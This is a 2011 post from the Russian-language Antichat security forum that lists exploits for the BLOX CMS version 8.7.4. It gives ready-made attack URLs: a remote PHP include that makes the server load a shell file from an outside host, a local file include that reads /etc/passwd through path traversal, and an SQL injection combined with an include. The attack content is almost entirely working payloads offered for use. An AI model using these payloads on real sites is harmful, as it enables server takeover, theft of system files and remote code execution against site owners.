HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.01.2011, 21:40
[Dark Green]
Новичок
Регистрация: 13.05.2010
Сообщений: 11
Провел на форуме:
118828

Репутация: 13
По умолчанию

Офф. сайт: Blox.ru | Информация о CMS

Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =)

[PHP-Include REMOTE]

BLOX\functions\go.php[8]

register_globals=ON

Код:
Code:
http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]

BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]

register_globals=ON

Код:
Code:
http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]

BLOX\functions\go.php[29, 119-142]

Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.

Код:
Code:
http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ